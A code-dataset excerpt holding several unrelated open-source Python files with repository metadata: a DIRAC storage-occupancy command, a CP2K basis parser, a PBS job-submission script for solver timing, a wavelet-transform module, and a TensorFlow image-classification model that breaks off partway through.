33a189cf07ca08589f53fda5208b006d7b48d004073fb560e9c4d71c6d26d8a0
|
# $HeadURL: $
''' SpaceTokenOccupancyCommand
The Command gets information of the SpaceTokenOccupancy from the lcg_utils
'''
import lcg_util
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities.Subprocess import pythonCall
from DIRAC.ResourceStatusSystem.Command.Command import Command
from DIRAC.ResourceStatusSystem.Client.ResourceManagementClient import ResourceManagementClient
from DIRAC.ResourceStatusSystem.Utilities import CSHelpers
__RCSID__ = '$Id: $'
class SpaceTokenOccupancyCommand( Command ):
'''
Uses lcg_util to query status of endpoint for a given token.
'''
def __init__( self, args = None, clients = None ):
super( SpaceTokenOccupancyCommand, self ).__init__( args, clients )
if 'ResourceManagementClient' in self.apis:
self.rmClient = self.apis[ 'ResourceManagementClient' ]
else:
self.rmClient = ResourceManagementClient()
def _storeCommand( self, results ):
'''
Stores the results of doNew method on the database.
'''
for result in results:
resQuery = self.rmClient.addOrModifySpaceTokenOccupancyCache( result[ 'Endpoint' ],
result[ 'Token' ],
result[ 'Total' ],
result[ 'Guaranteed' ],
result[ 'Free' ] )
if not resQuery[ 'OK' ]:
return resQuery
return S_OK()
def _prepareCommand( self ):
'''
SpaceTokenOccupancy requires one argument:
- elementName : <str>
Given a (storage)elementName, we calculate its endpoint and spaceToken,
which are used to query the srm interface.
'''
if not 'name' in self.args:
return S_ERROR( '"name" not found in self.args' )
elementName = self.args[ 'name' ]
endpoint = CSHelpers.getStorageElementEndpoint( elementName )
if not endpoint[ 'OK' ]:
return endpoint
endpoint = endpoint[ 'Value' ]
spaceToken = CSHelpers.getSEProtocolOption( elementName, 'SpaceToken' )
if not spaceToken[ 'OK' ]:
return spaceToken
spaceToken = spaceToken[ 'Value']
return S_OK( ( endpoint, spaceToken ) )
def doNew( self, masterParams = None ):
'''
Gets the parameters to run, either from the master method or from its
own arguments.
It queries the srm interface, and hopefully it will not crash. Out of the
results, we keep totalsize, guaranteedsuze, and unusedsize.
Then, they are recorded and returned.
'''
if masterParams is not None:
spaceTokenEndpoint, spaceToken = masterParams
else:
params = self._prepareCommand()
if not params[ 'OK' ]:
return params
spaceTokenEndpoint, spaceToken = params[ 'Value' ]
# 10 secs of timeout. If it works, the reply is immediate.
occupancy = pythonCall( 10, lcg_util.lcg_stmd, spaceToken, spaceTokenEndpoint, True, 0 )
if not occupancy[ 'OK' ]:
return occupancy
occupancy = occupancy[ 'Value' ]
#Timeout does not work here...
#occupancy = lcg_util.lcg_stmd( spaceToken, spaceTokenEndpoint, True, 0 )
if occupancy[ 0 ] != 0:
return S_ERROR( occupancy )
output = occupancy[ 1 ][ 0 ]
sTokenDict = {}
sTokenDict[ 'Endpoint' ] = spaceTokenEndpoint
sTokenDict[ 'Token' ] = spaceToken
sTokenDict[ 'Total' ] = float( output.get( 'totalsize', '0' ) ) / 1e12 # Bytes to Terabytes
sTokenDict[ 'Guaranteed' ] = float( output.get( 'guaranteedsize', '0' ) ) / 1e12
sTokenDict[ 'Free' ] = float( output.get( 'unusedsize', '0' ) ) / 1e12
storeRes = self._storeCommand( [ sTokenDict ] )
if not storeRes[ 'OK' ]:
return storeRes
return S_OK( [ sTokenDict ] )
def doCache( self ):
'''
Method that reads the cache table and tries to read from it. It will
return a list of dictionaries if there are results.
'''
params = self._prepareCommand()
if not params[ 'OK' ]:
return params
spaceTokenEndpoint, spaceToken = params[ 'Value' ]
result = self.rmClient.selectSpaceTokenOccupancyCache( spaceTokenEndpoint, spaceToken )
if result[ 'OK' ]:
result = S_OK( [ dict( zip( result[ 'Columns' ], res ) ) for res in result[ 'Value' ] ] )
return result
def doMaster( self ):
'''
Master method. Gets all endpoints from the storage elements and all
the spaceTokens. Could have taken from Shares/Disk as well.
It queries for all their possible combinations, unless there are records
in the database for those combinations, which then are not queried.
'''
storageElementNames = CSHelpers.getStorageElements()
if not storageElementNames[ 'OK' ]:
return storageElementNames
storageElementNames = storageElementNames[ 'Value' ]
endpointTokenSet = set()
for storageElementName in storageElementNames:
endpoint = CSHelpers.getStorageElementEndpoint( storageElementName )
if not endpoint[ 'OK' ]:
continue
endpoint = endpoint[ 'Value' ]
spaceToken = CSHelpers.getStorageElementSpaceToken( storageElementName )
if not spaceToken[ 'OK' ]:
continue
spaceToken = spaceToken[ 'Value' ]
endpointTokenSet.add( ( endpoint, spaceToken ) )
gLogger.verbose( 'Processing %s' % endpointTokenSet )
for elementToQuery in endpointTokenSet:
result = self.doNew( elementToQuery )
if not result[ 'OK' ]:
self.metrics[ 'failed' ].append( result )
return S_OK( self.metrics )
#...............................................................................
#EOF
|
Sbalbp/DIRAC
|
ResourceStatusSystem/Command/SpaceTokenOccupancyCommand.py
|
Python
|
gpl-3.0
| 6,129
|
[
"DIRAC"
] |
8d19b79a8846971db9b9860e216e9a1253e23a662051a956e127d2a577ada740
|
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Timothy Berkelbach <tim.berkelbach@gmail.com>
#
'''
parse CP2K format
'''
import re
from pyscf.gto.basis import parse_nwchem
MAXL = 8
def parse(string, optimize=False):
'''Parse the basis text which is in CP2K format, return an internal
basis format which can be assigned to :attr:`Mole.basis`
Lines started with # are ignored.
'''
bastxt = []
for dat in string.splitlines():
x = dat.split('#')[0].strip()
if (x and not x.startswith('END') and not x.startswith('BASIS')):
bastxt.append(x)
return _parse(bastxt, optimize)
def load(basisfile, symb, optimize=False):
return _parse(search_seg(basisfile, symb), optimize)
def _parse(blines, optimize=False):
header_ln = blines.pop(0)
nsets = int(blines.pop(0))
basis = []
for n in range(nsets):
comp = [int(p) for p in blines.pop(0).split()]
n, lmin, lmax, nexps, ncontractions = comp[0], comp[1], comp[2], comp[3], comp[4:]
basis_n = [[l] for l in range(lmin,lmax+1)]
for nexp in range(nexps):
bfun = [float(x) for x in blines.pop(0).split()]
exp = bfun.pop(0)
for i,l in enumerate(range(lmin,lmax+1)):
cl = [exp]
for c in range(ncontractions[i]):
cl.append(bfun.pop(0))
basis_n[i].append(tuple(cl))
basis.extend(basis_n)
basis_sorted = []
for l in range(MAXL):
basis_sorted.extend([b for b in basis if b[0] == l])
if optimize:
basis_sorted = parse_nwchem.optimize_contraction(basis_sorted)
basis_sorted = parse_nwchem.remove_zero(basis_sorted)
return basis_sorted
BASIS_SET_DELIMITER = re.compile('# *BASIS SET.*\n')
def search_seg(basisfile, symb):
with open(basisfile, 'r') as fin:
fdata = re.split(BASIS_SET_DELIMITER, fin.read())
for dat in fdata[1:]:
dat0 = dat.split(None, 1)
if dat0 and dat0[0] == symb:
# remove blank lines
return [x.strip() for x in dat.splitlines()
if x.strip() and 'END' not in x]
raise RuntimeError('Basis not found for %s in %s' % (symb, basisfile))
|
gkc1000/pyscf
|
pyscf/pbc/gto/basis/parse_cp2k.py
|
Python
|
apache-2.0
| 2,822
|
[
"CP2K",
"PySCF"
] |
df676e6e398d00f170f8bd9b48f296645b207a9073a06108a90bdaba026dec3a
|
#!/usr/bin/env python
# This script requires all matrices to be in PETSc binary format in the petsc subdir
import sys, os, glob, random
import datetime,time
from solvers import *
petsc = False
if petsc:
tmdir = 'timing-aciss'
matrixsubdir = 'petsc'
petsc_matrix_suffix='.petsc'
donefile = 'DONE'
jobname = 'petsc'
else:
tmdir = 'timing-moose-aciss'
matrixsubdir = 'moose'
petsc_matrix_suffix='.mat'
donefile = 'DONE_moose'
jobname = 'moose'
#jobname = 'default'
def resetBuffer():
global tmdir
#b = '#!/bin/bash\n\nmodule load mpi/mpich-3.1_gcc-4.9\n\n'
b = '#!/bin/bash\n\nmodule load gcc/4.9\n\n'
b += 'export PETSC_DIR=/home11/bnorris2/petsc/petsc-3.5.3; export PETSC_ARCH=arch-linux2-c-mpich3.1-gcc4.9\n\n'
b += 'export LD_LIBRARY_PATH=$PETSC_DIR/$PETSC_ARCH/lib:$LD_LIBRARY_PATH\n\n'
b += 'cd /home11/bnorris2/UFloridaSparseMat/%s\n\n' % tmdir
return b
def getJobs():
s = commands.getstatusoutput('qstat -a | grep norris | grep %s | wc -l' % jobname)[1]
return int(s)
# Directory contaning the *.petsc matrices:
#wdir='/gpfs/mira-fs0/projects/PEACEndStation/norris/UFloridaSparseMat/'
wdir='/home11/bnorris2/UFloridaSparseMat/'
# Directory for storing results:
tdir=wdir + tmdir + '/'
mdir=wdir + matrixsubdir + '/'
cdir='/home11/bnorris2/research/lighthouse/sandbox/petsc/new/' #os.getcwd()
#nprocs = 4096 # run with qsub -n 256 --proccount 4096 --mode c16 -t 60
nprocs = 2048 # run with qsub -n 128 --proccount 2048 --mode c16 -t 60
#nprocs = 1024 # run with qsub -n 256 --proccount 1024 --mode c4 -t 60
p = 16
matrices = glob.glob(mdir+'/*.%s' % petsc_matrix_suffix)
donelist=[]
# DONE_TRILINOS
if os.path.exists(donefile):
donelist=open(donefile,'r').readlines()
else:
print "Error: can't find done matrix file"
exit(1)
import commands
#if (getJobs() > 0):
#donelist = list(reversed(donelist))
solveropts = getsolvers()
buf = resetBuffer()
cleanup = 'wait\n'
totalprocs = 1
env = os.environ
hashlist = solveropts.keys()
random.shuffle(hashlist)
#print "Hi", tdir
for hashnum in hashlist:
solver_optstr = solveropts[hashnum]
if totalprocs > nprocs: break
for matname in donelist:
while (getJobs() > 20): time.sleep(60)
matname = matname.strip()
matrixpath=mdir+matname+petsc_matrix_suffix
if not os.path.exists(matrixpath):
print "No PETSc matrix:", matrixpath
continue
else:
print "PETSc matrix:", matrixpath
if totalprocs > nprocs: break
logfile = tdir + '%s.%s.log' % (matname, str(hashnum))
lockfile = tdir + '.%s.%s.log' % (matname, str(hashnum))
print "Logfile:", logfile
if os.path.exists(lockfile) or os.path.exists(logfile): continue
else: os.system("echo %s > %s" % (matname,lockfile))
opts = [' -f ',mdir+matname+petsc_matrix_suffix, ' -hash', hashnum, solver_optstr, ' -logfile', logfile, ' -ksp_view -log_summary -options_left -ksp_error_if_not_converged 1 -ksp_converged_reason ']
cmd = os.path.join(cdir,'solvers-aciss')
#buf += 'runjob --np 1 -p ' + str(p) + ' --block $COBALT_PARTNAME --verbose=INFO : ' + cmd + ' ' + ' '.join(opts) + ' > ' + logfile + ' \n'
#buf += 'mpiexec -np 1 ' + cmd + ' '.join(opts) + ' > ' + logfile + ' \n'
buf += cmd + ' '.join(opts) + '; \n'
print cmd + ' ' + ' '.join(opts)
pbsscriptfile = '%s/.timing_%s_%s.sh' % (tdir,matname,str(hashnum))
f = open(pbsscriptfile,'w')
f.write(buf)
f.close()
qsubcmd='qsub -q short -N "%s" -l walltime=4:00:00 %s' % (jobname,pbsscriptfile)
ts = time.time()
ts = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print ts, '\n', qsubcmd
os.system(qsubcmd)
|
LighthouseHPC/lighthouse
|
sandbox/petsc/new/solverscript-aciss.py
|
Python
|
mit
| 3,666
|
[
"MOOSE"
] |
cbb318b2ae9a64c6fa0391405f975d7d4d6be026e240ecb1075ef040477fc334
|
"""
created on Feb 3, 2014
@author: Nikola Jajcay, jajcay(at)cs.cas.cz
inspired by A Practical Guide to Wavelet Analysis by Ch. Torrence and G. Compo
-- http://paos.colorado.edu/research/wavelets/ --
"""
import numpy as np
from scipy.fftpack import fft, ifft
from scipy.special import gamma
def morlet(k, scale, k0 = 6.):
"""
Returns the Morlet wavelet function as a function of Fourier frequency,
used for the wavelet transform in Fourier space.
Morlet wavelet: psi(x) = pi^(-1/4) * exp(i*k0*x) * exp(-x^2 / 2)
inputs:
k - numpy array with Fourier frequencies at which to calculate the wavelet
scale - the wavelet scale
k0 - wavenumber
"""
exponent = - np.power((scale * k - k0),2) / 2. * (k > 0.)
norm = np.sqrt(scale * k[1]) * (np.power(np.pi, -0.25)) * np.sqrt(len(k))
output = norm * np.exp(exponent)
output *= (k > 0.)
fourier_factor = (4 * np.pi) / (k0 + np.sqrt(2 + np.power(k0,2)))
coi = fourier_factor / np.sqrt(2.)
return output, fourier_factor, coi
def paul(k, scale, k0 = 4.):
"""
Returns the Paul wavelet function as a function of Fourier frequency,
used for the wavelet transform in Fourier space.
Paul wavelet: psi(x) = (2^m * i^m * m!) / sqrt(pi * (2m)!) * (1 - ix)^(-m + 1)
inputs:
k - numpy array with Fourier frequencies at which to calculate the wavelet
scale - the wavelet scale
k0 - order
"""
exponent = - np.power((scale * k),2) * (k > 0.)
norm = np.sqrt(scale * k[1]) * (np.power(2,k0) / np.sqrt(k0 * np.prod(np.arange(2,2*k0)))) * np.sqrt(len(k))
output = norm * np.power((scale * k),k0) * np.exp(exponent)
output *= (k > 0.)
fourier_factor = (4 * np.pi) / (2 * k0 + 1)
coi = fourier_factor * np.sqrt(2.)
return output, fourier_factor, coi
def DOG(k, scale, k0 = 2.):
"""
Returns the Derivative of Gaussian wavelet function as a function of Fourier frequency,
used for the wavelet transform in Fourier space. For m = 2 this wavelet is the Marr or
Mexican hat wavelet.
DOG wavelet: psi(x) = (-1)^(m+1) / sqrt (gamma(m+1/2)) * (d^m / dx^m) exp(-x^2 / 2)
inputs:
k - numpy array with Fourier frequencies at which to calculate the wavelet
scale - the wavelet scale
k0 - derivative
"""
exponent = - np.power((scale * k),2) / 2.
norm = np.sqrt(scale * k[1] / gamma(k0 + 0.5)) * np.sqrt(len(k))
output = - norm * np.power(1j,k0) * np.power((scale * k),k0) * np.exp(exponent)
fourier_factor = 2 * np.pi * np.sqrt(2 / (2 * k0 + 1))
coi = fourier_factor / np.sqrt(2.)
return output, fourier_factor, coi
def continous_wavelet(X, dt, pad = False, wavelet = morlet, **kwargs):
"""
Computes the wavelet transform of the vector X, with sampling rate dt.
inputs:
X - the time series, numpy array
dt - sampling time of dt
pad - if True, pad time series with 0 to get len(X) up to the next higher power of 2. It speeds up the FFT.
wavelet - which mother wavelet should be used. (morlet, paul, DOG)
--- kwargs ---
dj - the spacing between discrete scales.
s0 - the smallest scale of the wavelet
j1 - the number of scales minus one. Scales range from s0 up to s0 * 2^(j1+dj) to give a total of j1+1 scales.
k0 - parameter of Mother wavelet: Morlet - wavenumber, Paul - order, DOG - derivative
outputs:
wave - wavelet transform of the X. It is a complex numpy array of dim (n, j1+1)
period - the vector of Fourier periods in time units
scale - the vector of scale indices, given by s0 * 2^(j*dj)
coi - Cone-of-Influence, vector that contains a maximum period of useful information at particular time
"""
# map arguments
if 'dj' in kwargs:
dj = kwargs['dj']
else:
dj = 0.25
if 's0' in kwargs:
s0 = kwargs['s0']
else:
s0 = 2 * dt
if 'j1' in kwargs:
j1 = np.int(kwargs['j1'])
else:
j1 = np.fix(np.log(len(X)*dt/s0) / np.log(2)) / dj
if 'k0' in kwargs:
k0 = kwargs['k0']
else:
k0 = 6.
n1 = len(X)
Y = X - np.mean(X)
#Y = X
# padding, if needed
if pad:
base2 = int(np.fix(np.log(n1)/np.log(2) + 0.4999999)) # power of 2 nearest to len(X)
Y = np.concatenate( (Y, np.zeros((np.power(2, (base2+1))-n1))) )
n = len(Y)
# wavenumber array
k = np.arange(1, np.fix(n/2) + 1)
k *= (2. * np.pi) / (n * dt)
k_minus = -k[int(np.fix(n-1))//2 - 1::-1]
k = np.concatenate((np.array([0.]), k, k_minus))
# compute FFT of the (padded) time series
f = fft(Y)
# construct scale array and empty period & wave arrays
scale = np.array( [s0 * np.power(2, x*dj) for x in range(0,j1+1)] )
period = scale
wave = np.zeros((j1+1, n), dtype = np.complex)
# loop through scales and compute tranform
for i in range(j1+1):
daughter, fourier_factor, coi = wavelet(k, scale[i], k0)
wave[i, :] = ifft(f * daughter)
period = fourier_factor * scale
coi *= dt * np.concatenate( (np.array([1e-5]), np.arange(1,(n1)/2), np.arange((n1/2 - 1),0,-1), np.array([1e-5])) )
wave = wave[:, :n1]
return wave, period, scale, coi
|
jajcayn/pyclits
|
pyclits/wavelet_analysis.py
|
Python
|
mit
| 5,336
|
[
"Gaussian"
] |
ca054f6b0aa39b328c6a451074e2d601b7552102007a12f620d717f7e781db6a
|
"""
The ``model`` module
======================
Contains the class Model which implements the core model for CG detection,
training, testing and visualization functions.
"""
import os
import time
import random
from . import image_loader as il
import tensorflow as tf
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.colors as mcolors
import csv
import configparser
import numpy as np
from PIL import Image
GPU = '/gpu:0'
config = 'server'
from sklearn.metrics import roc_curve
from sklearn.metrics import auc
from sklearn.metrics import accuracy_score as acc
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.svm import SVC
from sklearn.preprocessing import normalize
import pickle
# seed initialisation
print("\n random initialisation ...")
random_seed = int(time.time() % 10000 )
random.seed(random_seed) # for reproducibility
print(' random seed =', random_seed)
# tool functions
def variable_summaries(var):
"""Attach a lot of summaries to a Tensor (for TensorBoard visualization)."""
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
def image_summaries(var, name):
tf.summary.image(name + '_1', var[:,:,:,0:1], max_outputs = 1)
tf.summary.image(name + '_2', var[:,:,:,1:2], max_outputs = 1)
tf.summary.image(name + '_3', var[:,:,:,2:3], max_outputs = 1)
# tf.summary.image(name + '_4', var[:,:,:,3:4], max_outputs = 1)
# tf.summary.image(name + '_5', var[:,:,:,4:5], max_outputs = 1)
# tf.summary.image(name + '_6', var[:,:,:,5:6], max_outputs = 1)
# tf.summary.image(name + '_7', var[:,:,:,6:7], max_outputs = 1)
# tf.summary.image(name + '_8', var[:,:,:,7:8], max_outputs = 1)
def filter_summary(filters, name):
tf.summary.image(name + '_1', tf.stack([filters[:,:,0,0:1]]), max_outputs = 1)
tf.summary.image(name + '_2', tf.stack([filters[:,:,0,1:2]]), max_outputs = 1)
tf.summary.image(name + '_3', tf.stack([filters[:,:,0,2:3]]), max_outputs = 1)
tf.summary.image(name + '_4', tf.stack([filters[:,:,0,3:4]]), max_outputs = 1)
tf.summary.image(name + '_5', tf.stack([filters[:,:,0,4:5]]), max_outputs = 1)
tf.summary.image(name + '_6', tf.stack([filters[:,:,0,5:6]]), max_outputs = 1)
# tf.summary.image(name + '_7', tf.stack([filters[:,:,0,6:7]]), max_outputs = 1)
# tf.summary.image(name + '_8', tf.stack([filters[:,:,0,7:8]]), max_outputs = 1)
def weight_variable(shape, nb_input, seed = None):
"""Creates and initializes (truncated normal distribution) a variable weight Tensor with a defined shape"""
sigma = np.sqrt(2/nb_input)
# print(sigma)
initial = tf.truncated_normal(shape, stddev=sigma, seed = random_seed)
return tf.Variable(initial)
def bias_variable(shape):
"""Creates and initializes (truncated normal distribution with 0.5 mean) a variable bias Tensor with a defined shape"""
initial = tf.truncated_normal(shape, mean = 0.5, stddev=0.1, seed = random_seed)
return tf.Variable(initial)
def conv2d(x, W):
"""Returns the 2D convolution between input x and the kernel W"""
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
"""Returns the result of max-pooling on input x with a 2x2 window"""
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def avg_pool_2x2(x):
"""Returns the result of average-pooling on input x with a 2x2 window"""
return tf.nn.avg_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def max_pool_10x10(x):
"""Returns the result of max-pooling on input x with a 10x10 window"""
return tf.nn.max_pool(x, ksize=[1, 10, 10, 1],
strides=[1, 10, 10, 1], padding='SAME')
def avg_pool_10x10(x):
"""Returns the result of average-pooling on input x with a 10x10 window"""
return tf.nn.avg_pool(x, ksize=[1, 10, 10, 1],
strides=[1, 10, 10, 1], padding='SAME')
def histogram(x, nbins):
"""Returns the Tensor containing the nbins values of the normalized histogram of x"""
h = tf.histogram_fixed_width(x, value_range = [-1.0,1.0],
nbins = nbins, dtype = tf.float32)
return(h)
def gaussian_func(mu, x, n, sigma):
"""Returns the average of x composed with a gaussian function
:param mu: The mean of the gaussian function
:param x: Input values
:param n: Number of input values
:param sigma: Variance of the gaussian function
:type mu: float
:type x: Tensor
:type n: int
:type sigma: float
"""
gauss = tf.contrib.distributions.Normal(mu=mu, sigma=sigma)
# return(tf.reduce_sum(gauss.pdf(xmax - tf.nn.relu(xmax - x))/n))
return(tf.reduce_sum(gauss.pdf(x)/n))
def gaussian_kernel(x, nbins = 8, values_range = [0, 1], sigma = 0.1,image_size = 100):
"""Returns the values of x's nbins gaussian histogram
:param x: Input values (supposed to be images)
:param nbins: Number of bins (different gaussian kernels)
:param values_range: The range of the x values
:param sigma: Variance of the gaussian functions
:param image_size: The size of the images x (for normalization)
:type x: Tensor
:type nbins: int
:type values_range: table
:type sigma: float
:type image_size: int
"""
mu_list = np.float32(np.linspace(values_range[0], values_range[1], nbins + 1))
n = np.float32(image_size**2)
function_to_map = lambda m : gaussian_func(m, x, n, sigma)
return(tf.map_fn(function_to_map, mu_list))
def plot_gaussian_kernel(nbins = 8, values_range = [0, 1], sigma = 0.1):
"""Plots the gaussian kernels used for estimating the histogram"""
r = values_range[1] - values_range[0]
mu_list = []
for i in range(nbins+1):
mu_list.append(values_range[0] + i*r/(nbins+1))
range_plot = np.linspace(values_range[0]-0.1, values_range[1]+0.1, 1000)
plt.figure()
for mu in mu_list:
plt.plot(range_plot, np.exp(-(range_plot-mu)**2/(sigma**2)))
plt.title("Gaussian kernels used for estimating the histograms")
plt.show()
def classic_histogram_gaussian(x, k, nbins = 8, values_range = [0, 1], sigma = 0.6):
"""Computes gaussian histogram values for k input images"""
function_to_map = lambda y: tf.stack([gaussian_kernel(y[:,:,i], nbins, values_range, sigma) for i in range(k)])
res = tf.map_fn(function_to_map, x)
return(res)
def stat(x):
"""Computes statistical features for an image x : mean, min, max and variance"""
# sigma = tf.reduce_mean((x - tf.reduce_mean(x))**2)
return(tf.stack([tf.reduce_mean(x), tf.reduce_min(x), tf.reduce_max(x), tf.reduce_mean((x - tf.reduce_mean(x))**2)]))
def compute_stat(x, k):
"""Computes statistical features for k images"""
# function_to_map = lambda y: tf.stack([stat(y[:,:,i]) for i in range(k)])
# res = tf.map_fn(function_to_map, x)
res = tf.transpose(tf.stack([tf.reduce_mean(x, axis=[1,2]), tf.reduce_min(x, axis=[1,2]), tf.reduce_max(x, axis=[1,2]), tf.reduce_mean((x - tf.reduce_mean(x, axis=[1,2], keep_dims = True))**2, axis=[1,2])]), [1,2,0])
return(res)
class Model:
"""
Class Model
======================
Defines a model for single-image CG detection and numerous methods to :
- Create the TensorFlow graph of the model
- Train the model on a specific database
- Reload past weights
- Test the model (simple classification, full-size images with boosting and splicing)
- Visualize some images and probability maps
"""
def __init__(self, database_path, image_size, config = 'Personal', filters = [32, 64],
feature_extractor = 'Stats', remove_context = False,
nbins = 10, remove_filter_size = 3, batch_size = 50,
using_GPU = False, only_green = True):
"""Defines a model for single-image classification
:param database_path: Absolute path to the default patch database (training, validation and testings are performed on this database)
:param image_size: Size of the patches supposed squared
:param config: Name of the section to use in the config.ini file for configuring directory paths (weights, training summaries and visualization dumping)
:param filters: Table with the number of output filters of each layer
:param feature_extractor: Two choices 'Stats' or 'Hist' for the feature extractor
:param nbins: Number of bins on the histograms. Used only if the feature_extractor parameter is 'Hist'
:param batch_size: The size of the batch for training
:param using_GPU: Whether to use GPU for computation or not
:type database_path: str
:type image_size: int
:type config: str
:type filters: table
:type feature_extractor: str
:type nbins: int
:type batch_size: int
:type using_GPU: bool
"""
clear = lambda: os.system('clear')
clear()
print(' tensorFlow version: ', tf.__version__)
# read the configuration file
conf = configparser.ConfigParser()
conf.read('config.ini')
if config not in conf:
raise ValueError(config + ' is not in the config.ini file... Please create the corresponding section')
self.dir_ckpt = conf[config]['dir_ckpt']
self.dir_summaries = conf[config]['dir_summaries']
self.dir_visualization = conf[config]['dir_visualization']
print(' Check-points directory : ' + self.dir_ckpt)
print(' Summaries directory : ' + self.dir_summaries)
print(' Visualizations directory : ' + self.dir_visualization)
# setting the parameters of the model
self.nf = filters
self.nl = len(self.nf)
self.filter_size = 3
self.feature_extractor = 'Stats'
if self.feature_extractor != 'Stats' and self.feature_extractor != 'Hist':
raise ValueError('''Feature extractor must be 'Stats' or 'Hist' ''')
self.database_path = database_path
self.image_size = image_size
self.batch_size = batch_size
self.nbins = nbins
self.using_GPU = using_GPU
self.remove_context = remove_context
self.remove_filter_size = remove_filter_size
self.only_green = only_green
# getting the database
self.import_database()
self.nb_channels = self.data.nb_channels
# create the TensorFlow graph
if using_GPU:
with tf.device(GPU):
self.create_graph(nb_class = self.nb_class,
feature_extractor = self.feature_extractor,
nl = self.nl, nf = self.nf, filter_size = self.filter_size)
else:
self.create_graph(nb_class = self.nb_class,
feature_extractor = self.feature_extractor,
nl = self.nl, nf = self.nf, filter_size = self.filter_size)
def import_database(self):
"""Creates a Database_loader to load images from the distant database"""
# load data
print(' import data : image_size = ' +
str(self.image_size) + 'x' + str(self.image_size) + '...')
self.data = il.Database_loader(self.database_path, self.image_size,
proportion = 1, only_green=self.only_green)
self.nb_class = self.data.nb_class
def create_graph(self, nb_class, nl = 2, nf = [32, 64], filter_size = 3,
feature_extractor = 'Stats'):
"""Creates the TensorFlow graph"""
print(' create model ...')
# input layer. One entry is a float size x size, 3-channels image.
# None means that the number of such vector can be of any lenght.
if feature_extractor == 'Hist':
print(' Model with histograms.')
else:
print(' Model with statistics.')
graph = tf.Graph()
with graph.as_default():
with tf.name_scope('Input_Data'):
x = tf.placeholder(tf.float32, [None, self.image_size, self.image_size, self.nb_channels])
self.x = x
# reshape the input data:
x_image = tf.reshape(x, [-1,self.image_size, self.image_size, self.nb_channels])
with tf.name_scope('Image_Visualization'):
tf.summary.image('Input_Data', x_image)
# first conv net layer
if self.remove_context:
print(' Creating layer 1 - Shape : ' + str(self.remove_filter_size) + 'x' +
str(self.remove_filter_size) + 'x' + str(self.nb_channels) + 'x' + str(nf[0]))
else:
print(' Creating layer 1 - Shape : ' + str(self.filter_size) + 'x' +
str(self.filter_size) + 'x' + str(self.nb_channels) + 'x' + str(nf[0]))
with tf.name_scope('Conv1'):
with tf.name_scope('Weights'):
if self.remove_context:
W_conv1 = weight_variable([self.remove_filter_size, self.remove_filter_size, self.nb_channels, nf[0]],
nb_input = self.remove_filter_size*self.remove_filter_size*self.nb_channels,
seed = random_seed)
else:
W_conv1 = weight_variable([self.filter_size, self.filter_size, self.nb_channels, nf[0]],
nb_input = self.filter_size*self.filter_size*self.nb_channels,
seed = random_seed)
self.W_conv1 = W_conv1
with tf.name_scope('Bias'):
b_conv1 = bias_variable([nf[0]])
# relu on the conv layer
if self.remove_context:
h_conv1 = conv2d(x_image, W_conv1)
else:
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1,
name = 'Activated_1')
self.h_conv1 = h_conv1
self.W_convs = [W_conv1]
self.b_convs = [b_conv1]
self.h_convs = [h_conv1]
image_summaries(self.h_convs[0], 'hconv1')
filter_summary(self.W_convs[0], 'Wconv1')
for i in range(1, nl):
print(' Creating layer ' + str(i+1) + ' - Shape : ' + str(self.filter_size) + 'x' +
str(self.filter_size) + 'x' + str(nf[i-1]) + 'x' + str(nf[i]))
# other conv
with tf.name_scope('Conv' + str(i+1)):
with tf.name_scope('Weights'):
W_conv2 = weight_variable([self.filter_size, self.filter_size, nf[i-1], nf[i]],
self.filter_size*self.filter_size*nf[i-1])
self.W_convs.append(W_conv2)
with tf.name_scope('Bias'):
b_conv2 = bias_variable([nf[i]])
self.b_convs.append(b_conv2)
h_conv2 = tf.nn.relu(conv2d(self.h_convs[i-1], W_conv2) + b_conv2,
name = 'Activated_2')
self.h_convs.append(h_conv2)
print(' Creating feature extraction layer')
nb_filters = nf[nl-1]
if self.feature_extractor == 'Hist':
# Histograms
nbins = self.nbins
size_flat = (nbins + 1)*nb_filters
range_hist = [0,1]
sigma = 0.07
# plot_gaussian_kernel(nbins = nbins, values_range = range_hist, sigma = sigma)
with tf.name_scope('Gaussian_Histogram'):
hist = classic_histogram_gaussian(self.h_convs[nl-1], k = nb_filters,
nbins = nbins,
values_range = range_hist,
sigma = sigma)
self.hist = hist
flatten = tf.reshape(hist, [-1, size_flat], name = "Flatten_Hist")
self.flatten = flatten
else:
nb_stats = 4
size_flat = nb_filters*nb_stats
with tf.name_scope('Simple_statistics'):
s = compute_stat(self.h_convs[nl-1], nb_filters)
self.stat = s
flatten = tf.reshape(s, [-1, size_flat], name = "Flattened_Stat")
self.flatten = flatten
print(' Creating MLP ')
# Densely Connected Layer
# we add a fully-connected layer with 1024 neurons
with tf.variable_scope('Dense1'):
with tf.name_scope('Weights'):
W_fc1 = weight_variable([size_flat, 1024],
nb_input = size_flat)
with tf.name_scope('Bias'):
b_fc1 = bias_variable([1024])
# put a relu
h_fc1 = tf.nn.relu(tf.matmul(flatten, W_fc1) + b_fc1,
name = 'activated')
# dropout
with tf.name_scope('Dropout1'):
keep_prob = tf.placeholder(tf.float32)
self.keep_prob = keep_prob
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
self.h_fc1 = h_fc1
# readout layer
with tf.variable_scope('Readout'):
with tf.name_scope('Weights'):
